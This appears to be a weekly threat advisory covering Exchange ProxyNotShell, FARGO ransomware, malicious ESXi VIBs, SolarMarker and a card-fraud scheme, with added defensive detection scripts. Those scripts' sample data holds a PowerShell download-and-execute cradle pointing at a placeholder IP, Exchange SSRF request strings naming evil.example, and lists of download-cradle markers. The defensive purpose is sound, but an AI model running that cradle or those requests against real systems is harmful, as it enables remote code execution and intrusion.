SISA Weekly Threat Watch
SISA Weekly Threat Watch – our weekly feature brings you a quick snapshot of the major security vulnerabilities and threats that affected organizations worldwide this week. These recurring, actionable threat advisories also provide information and recommendations to help security teams defend against the latest critical threats.
ReasonLabs, a cybersecurity firm, has revealed a large-scale operation that allegedly stole millions of dollars from credit cards between 2019 and earlier this year. The scheme involves running a large network of fake dating websites, complete with working customer service departments. Once the websites are operational, the con artists persuade payment processors to grant them merchant accounts so they can accept card payments. The scammers then buy thousands of stolen credit card numbers on the darknet and charge them for "services" on their bogus websites.
The scammers behind this scheme most likely employed proxies to build the multiple fake dating websites. All of the websites reference the domain https://dateprofits[.]com as their affiliate management program. As a best practice, all cardholders should review their monthly billing statements and immediately report any charge they do not recognise. No matter how small the charge, failing to report it gives the threat actors more time to carry out their plans; small test charges are often the first sign that a card number is being abused.
Microsoft has confirmed two recently discovered zero-day vulnerabilities in Microsoft Exchange Server 2013, 2016, and 2019. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, and exploiting it requires authenticated access to the Exchange server. Once exploited, it can be chained with CVE-2022-41082 to achieve remote code execution (RCE) when PowerShell Remoting is reachable by the attacker.
Because the attacker already holds a valid account, the code execution inherits that account's privileges: the attacker can view, change, or delete data and create new accounts. The current mitigation is to add a URL Rewrite request-blocking rule under IIS Manager -> Default Web Site -> Autodiscover -> URL Rewrite -> Actions that matches the known attack pattern against the request URI (not just the URL path). Microsoft revised the exact pattern several times after publishing it, so take the current string from its guidance rather than from older copies. Microsoft also suggests that admins block the Remote PowerShell ports 5985/TCP and 5986/TCP; scope that block so it does not cut off legitimate remote administration. These are stopgaps rather than fixes, so it is also recommended to apply automated patch management to enterprise assets on a frequent basis and install the security update as soon as it is available.
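The blocking rule above only helps if it fires on the same requests defenders later hunt for in IIS logs. The following added example (written for this advisory, not Microsoft's or SISA's code) reconstructs the request URI from the cs-uri-stem and cs-uri-query columns of a W3C-format IIS log, URL-decodes it once, and applies a regex modelled on the published mitigation pattern (both "autodiscover" and "powershell" must appear in the decoded URI). The log lines, IP addresses and usernames are constructed; the third line shows why decoding matters, since a percent-encoded request would slip past a rule that matches the raw path.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not real traffic): a #Fields header plus four requests.
SAMPLE_IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2022-10-03 09:12:01 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.10 200
2022-10-03 09:12:07 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell?X=a 443 corp\\jdoe 203.0.113.10 200
2022-10-03 09:12:09 10.0.0.5 GET /autodiscover/autodiscover.json %40evil.example%2FPOWERSHELL%3FX%3Db 443 corp\\jdoe 203.0.113.10 200
2022-10-03 09:13:00 10.0.0.5 GET /autodiscover/autodiscover.xml - 443 corp\\asmith 198.51.100.7 401
"""

# Modelled on the decoded-URI pattern Microsoft published for its URL Rewrite mitigation:
# the request must mention both "autodiscover" and "powershell" (case-insensitive).
ATTACK_PATTERN = re.compile(r"(?=.*autodiscover)(?=.*powershell)", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request line, using the #Fields header for the column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than mis-map columns
        yield dict(zip(fields, values))


def request_uri(entry):
    """Rebuild the full request URI (stem + query) and URL-decode it once."""
    stem = entry.get("cs-uri-stem", "")
    query = entry.get("cs-uri-query", "-")
    uri = stem if query == "-" else f"{stem}?{query}"
    return unquote(uri)


def find_proxynotshell_hits(text):
    """Return (time, client ip, user, status, decoded uri) for every matching request."""
    hits = []
    for entry in parse_w3c(text):
        uri = request_uri(entry)
        if ATTACK_PATTERN.search(uri):
            hits.append((entry.get("time", "-"), entry.get("c-ip", "-"),
                         entry.get("cs-username", "-"), entry.get("sc-status", "-"), uri))
    return hits


if __name__ == "__main__":
    for hit in find_proxynotshell_hits(SAMPLE_IIS_LOG):
        print("suspicious:", hit)
```

The pattern is deliberately loose: legitimate Autodiscover requests never carry the string "powershell", so every hit deserves a look, and a hit with a 200 status from an authenticated user is the case to escalate first. A single decode mirrors the UrlDecode step in the revised IIS rule; if you see double-encoded variants in your logs, decode until the string stops changing.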
FARGO, like GlobeImposter, is a well-known ransomware family that targets poorly secured MS-SQL servers, typically those exposed to the internet with weak or brute-forced credentials. According to the researchers, the MS-SQL process on the compromised machine starts the infection by downloading a .NET file via cmd.exe and powershell.exe. That payload retrieves additional malware, including the locker, and then generates and executes a BAT file that shuts down services and processes so the files they hold open can be encrypted.
The ransomware payload then attempts to delete the registry key for Raccine, an open-source ransomware "vaccine", by injecting itself into AppLaunch.exe, a legitimate Windows process. The malware then drops the ransom note (named "RECOVERY FILES.txt") and appends the extension ".Fargo3" to the encrypted files. Strong, unique passwords for SQL logins (the sa account in particular), keeping MS-SQL off the public internet, and keeping all machines up to date with the latest security patches are essential to stay protected from such attacks.
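The chain described above (sqlservr.exe spawning cmd.exe and powershell.exe, a download cradle, and files renamed to ".Fargo3") is easy to express as host-based detection rules. The following added example (written for this advisory, not the researchers' code) runs three such rules over constructed Sysmon-style process-creation and file-rename events; the paths, service account names and the download URL are assumptions for the example. It goes slightly beyond the text by also flagging any shell that runs under the SQL Server service account even when its direct parent is not sqlservr.exe, since the second stage of the chain is launched from cmd.exe rather than from the database process.

```python
import ntpath

# Constructed Sysmon-style events (not real telemetry). The first two mimic the chain
# sqlservr.exe -> cmd.exe -> powershell.exe pulling down a payload; the fourth mimics the
# locker (injected into AppLaunch.exe) renaming a file to ".Fargo3".
SAMPLE_EVENTS = [
    {"type": "process",
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.9/x'))",
     "User": r"NT SERVICE\MSSQLSERVER"},
    {"type": "process",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.9/x'))",
     "User": r"NT SERVICE\MSSQLSERVER"},
    {"type": "process",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe",
     "User": r"CORP\dba"},
    {"type": "rename",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "OldName": r"D:\Data\quarterly.xlsx",
     "NewName": r"D:\Data\quarterly.xlsx.Fargo3"},
    {"type": "rename",
     "Image": r"C:\Windows\explorer.exe",
     "OldName": r"D:\Data\draft.docx",
     "NewName": r"D:\Data\final.docx"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SQL_PROCESS = "sqlservr.exe"
# Default SQL Server service accounts; assumed for this example, adjust to your hosts.
SQL_SERVICE_ACCOUNTS = {r"NT SERVICE\MSSQLSERVER", r"NT SERVICE\MSSQL$SQLEXPRESS"}
RANSOM_EXTENSIONS = {".fargo3"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "-w hidden")


def basename(path):
    """Lower-cased file name of a Windows path, regardless of the host running this script."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the reasons an event looks like FARGO activity (empty list means no rule fired)."""
    reasons = []
    if event["type"] == "process":
        child = basename(event["Image"])
        if child not in SHELLS:
            return reasons
        if basename(event["ParentImage"]) == SQL_PROCESS:
            reasons.append("shell spawned directly by sqlservr.exe (xp_cmdshell-style)")
        if event.get("User") in SQL_SERVICE_ACCOUNTS:
            reasons.append("shell running under the SQL Server service account")
        cmd = event.get("CommandLine", "").lower()
        if any(marker in cmd for marker in DOWNLOAD_MARKERS):
            reasons.append("download cradle or hidden window in command line")
    elif event["type"] == "rename":
        ext = ntpath.splitext(event["NewName"].lower())[1]
        if ext in RANSOM_EXTENSIONS:
            reasons.append(f"file renamed with ransomware extension {ext}")
    return reasons


def triage(events):
    """Index and reasons for every event that trips at least one rule."""
    flagged = []
    for index, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            flagged.append((index, reasons))
    return flagged


if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, "->", "; ".join(reasons))
```

The first rule is the high-confidence one: a database engine has no business launching a shell unless xp_cmdshell or a similar feature is in deliberate use, so tune it by listing the jobs that legitimately do so rather than by loosening the match. The rename rule fires late (files are already being encrypted), which is why the process rules matter more.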
A threat actor tracked as UNC3886 has developed a new technique for establishing persistence on VMware ESXi hypervisors using malicious vSphere Installation Bundles (VIBs), allowing them to covertly control Windows and Linux virtual machines and vCenter servers. To mislead anyone inspecting the bundle, the attacker modified the acceptance level in the VIB's XML descriptor from "community" to "partner".
The attacker also installed the malicious VIBs with the `--force` flag, which bypasses the acceptance-level and other checks that would otherwise reject the bundle. Using these methods, the threat actor infected the compromised ESXi server with the malware known as VirtualPita and VirtualPie. These two backdoors allow execution of arbitrary commands, file upload and download, and starting and stopping of the logging system. To reduce the risk of compromise, it is recommended to use vCenter Single Sign-On and to consider decoupling ESXi and vCenter Servers from Active Directory. Centralized logging of ESXi environments is also essential, both for proactive detection of potentially malicious behavior and for event investigation. Since the attacker's descriptor tampering makes the reported acceptance level untrustworthy, audit installed VIBs with `esxcli software vib list`, compare the result against a known-good host, and verify signatures with `esxcli software vib signature verify` (ESXi 7.0 and later) rather than relying on the acceptance level alone.
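The following added example (written for this advisory, not Mandiant's or VMware's tooling) shows the audit step in code: it parses the column output of `esxcli software vib list`, checks each VIB against a known-good (name, version) baseline, and flags any bundle whose acceptance level is below VMwareAccepted or whose vendor claims VMware while its level says otherwise. The sample output, the baseline and the suspicious "esx-health-agent" entry are all constructed for the example; real output from your hosts drops in unchanged.

```python
import re

# Constructed output of `esxcli software vib list` from a hypothetical ESXi 7.0 host;
# the last row is a made-up suspicious entry, not a real VIB name.
SAMPLE_VIB_LIST = """\
Name                Version                       Vendor  Acceptance Level  Install Date
------------------  ----------------------------  ------  ----------------  ------------
esx-base            7.0.3-0.35.19193900           VMware  VMwareCertified   2022-03-14
lsu-hp-hpsa-plugin  2.0.0-16vmw.703.0.0.19193900  VMW     VMwareCertified   2022-03-14
tools-light         11.3.5.18557794-19193900      VMware  VMwareCertified   2022-03-14
nvme-pcie           1.2.3.16-1vmw.703.0.19193900  VMW     VMwareCertified   2022-03-14
esx-health-agent    1.0.0-1                       VMware  PartnerSupported  2022-09-20
"""

# Known-good (name, version) pairs, as you would capture them from a freshly built host
# of the same image profile; constructed for this example.
BASELINE = {
    ("esx-base", "7.0.3-0.35.19193900"),
    ("lsu-hp-hpsa-plugin", "2.0.0-16vmw.703.0.0.19193900"),
    ("tools-light", "11.3.5.18557794-19193900"),
    ("nvme-pcie", "1.2.3.16-1vmw.703.0.19193900"),
}

# ESXi acceptance levels, strongest first.
LEVEL_RANK = {"VMwareCertified": 4, "VMwareAccepted": 3, "PartnerSupported": 2, "CommunitySupported": 1}
VMWARE_VENDORS = {"VMware", "VMW"}


def parse_vib_list(text):
    """Parse esxcli's column output: a header row, a dashed ruler, then one row per VIB.
    Values never contain spaces, so splitting on runs of two or more spaces is safe."""
    lines = [line.rstrip() for line in text.splitlines() if line.strip()]
    columns = re.split(r"\s{2,}", lines[0])
    rows = []
    for line in lines[1:]:
        if line.startswith("-"):
            continue  # ruler line
        values = re.split(r"\s{2,}", line)
        if len(values) != len(columns):
            raise ValueError(f"unexpected column count in: {line!r}")
        rows.append(dict(zip(columns, values)))
    return rows


def audit_vibs(vibs, baseline):
    """Return (name, reasons) for every VIB that deserves a closer look."""
    accepted = LEVEL_RANK["VMwareAccepted"]
    findings = []
    for vib in vibs:
        level = vib["Acceptance Level"]
        rank = LEVEL_RANK.get(level, 0)  # unknown level string ranks lowest
        reasons = []
        if (vib["Name"], vib["Version"]) not in baseline:
            reasons.append("not in the known-good baseline")
        if rank < accepted:
            reasons.append(f"acceptance level {level} is below VMwareAccepted")
        if vib["Vendor"] in VMWARE_VENDORS and rank < accepted:
            reasons.append("vendor claims VMware but the level is not a VMware-signed one")
        if reasons:
            findings.append((vib["Name"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in audit_vibs(parse_vib_list(SAMPLE_VIB_LIST), BASELINE):
        print(name, "->", "; ".join(reasons))
```

Treat a hit as a lead, not a verdict: a genuinely PartnerSupported VIB carries a partner signature, whereas a tampered descriptor only claims that level, so follow every finding with signature verification on the host and a look at the VIB's file list and install date in the same esxcli output.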
The infamous SolarMarker threat actor group has returned with a changed attack strategy. In watering hole attacks, it now uses fake Chrome browser updates to distribute the information-stealing malware of the same name. The compromised websites are built on open-source content management systems (CMS) that are often unpatched and therefore easy to take over.
The SolarMarker operators initially relied on SEO poisoning to lure professionals searching for business documents and templates. The switch to faking Chrome updates to mislead employees indicates that the attackers are trying a new way to spread their data-stealing malware. Implementing appropriate endpoint monitoring and user awareness policies can help detect and prevent such threats; a useful teaching point is that Chrome updates itself through its built-in updater, so a website prompting the user to download an "update" is always a red flag. It is also recommended to avoid downloading files from unknown websites, as even a seemingly harmless action like looking for a template or agreement form can lead to infection.
See you next week with more interesting cybersecurity bites!